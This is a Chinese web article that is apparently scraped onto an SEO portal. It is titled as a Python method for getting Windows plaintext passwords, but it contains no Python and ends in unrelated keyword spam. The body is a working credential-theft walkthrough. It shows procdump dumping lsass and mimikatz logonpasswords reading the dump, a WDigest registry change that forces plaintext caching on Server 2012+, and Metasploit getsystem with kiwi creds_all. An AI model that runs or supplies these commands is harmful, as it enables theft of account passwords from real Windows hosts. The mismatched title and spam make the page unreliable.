千家信息网

python如何直接获取windows明文密码

发表于:2024-11-11 作者:千家信息网编辑
千家信息网最后更新 2024年11月11日,这篇文章主要介绍了python如何直接获取windows明文密码,具有一定借鉴价值,感兴趣的朋友可以参考下,希望大家阅读完这篇文章之后大有收获,下面让小编带着大家一起了解一下。01、Procdump+
千家信息网最后更新 2024年11月11日python如何直接获取windows明文密码

这篇文章主要介绍了python如何直接获取windows明文密码,具有一定借鉴价值,感兴趣的朋友可以参考下,希望大家阅读完这篇文章之后大有收获,下面让小编带着大家一起了解一下。

01、Procdump+Mimikatz

利用procdump+Mimikatz 绕过杀软获取Windows明文密码。

(1)工具准备:

ProcDump:

https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump

mimikatz:

https://github.com/gentilkiwi/mimikatz/

(2)Windows Server 2008 R2提取明文密码

在目标机器上生成存储文件:

procdump64.exe -accepteula -ma lsass.exe lsass.dmp

将lsass.dmp复制到本地,使用mimikatz 一行命令将结果输出到文本。

mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords" "exit"> pssword.txt

如图:成功从内存中提取明文密码。

02、Window 2012 R2抓取密码

在Windows2012系统及以上的系统,默认在内存缓存中禁止保存明文密码的。攻击者可以通过修改注册表的方式抓取明文,需要用户重新登录后才能成功抓取。

(1)修改注册表

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

(2)用户administrator注销后重新登录,成功抓取到明文信息。

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" > pssword.txt

03、MSF kiwi模块

使用kiwi模块需要system权限,所以我们在使用该模块之前需要将当前MSF中的shell提升为system。

提到system有两个方法,一是当前的权限是administrator用户,二是利用其它手段先提权到administrator用户。然后administrator用户可以直接getsystem到system权限。

meterpreter > getuidServer username: BYPASS-E97BA3FC\Administratormeterpreter > getsystem ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).meterpreter > getuidServer username: NT AUTHORITY\SYSTEM

加载kiwi模块:

load kiwi

列举系统中的明文密码:

creds_all

感谢你能够认真阅读完这篇文章,希望小编分享的"python如何直接获取windows明文密码"这篇文章对大家有帮助,同时也希望大家多多支持,关注行业资讯频道,更多相关知识等着你来学习!

明文 密码 用户 模块 篇文章 成功 权限 系统 内存 注册表 登录 一行 两个 价值 信息 兴趣 可以通过 同时 命令 工具 数据库的安全要保护哪些东西 数据库安全各自的含义是什么 生产安全数据库录入 数据库的安全性及管理 数据库安全策略包含哪些 海淀数据库安全审计系统 建立农村房屋安全信息数据库 易用的数据库客户端支持安全管理 连接数据库失败ssl安全错误 数据库的锁怎样保障安全 首都网络安全日设立 计算机网络技术专业有哪些行业 网络安全产品标准 数据库需求分析案例 数据库如何进行索引优化 汕头市招聘信息网络技术员 合金相图数据库 清风服务器怎么让神 华为服务器的制成厂 计算机网络安全操作系统安全 怎么查询使用数据库表的视图 王者荣耀服务器差 计算机数据库管理招聘 数据库最基本的检索技术 网络安全初学者入门书籍 滨州招聘hr软件开发公司 四年级网络安全知识竞赛试题 方舟高级服务器怎么进 php中间件数据库 计算机软件开发商是什么职业 服务器需要做的安全防护 网络安全问题种类 哪里有聊天软件开发 安卓软件开发与小程序 战舰世界手机查说数据库 我的世界服务器基岩版新手装备 奶块如何找到暮色森林的服务器 数据库备份恢复和安全实验 如何快速简单看电脑服务器好坏 信息网络安全 国家会议
0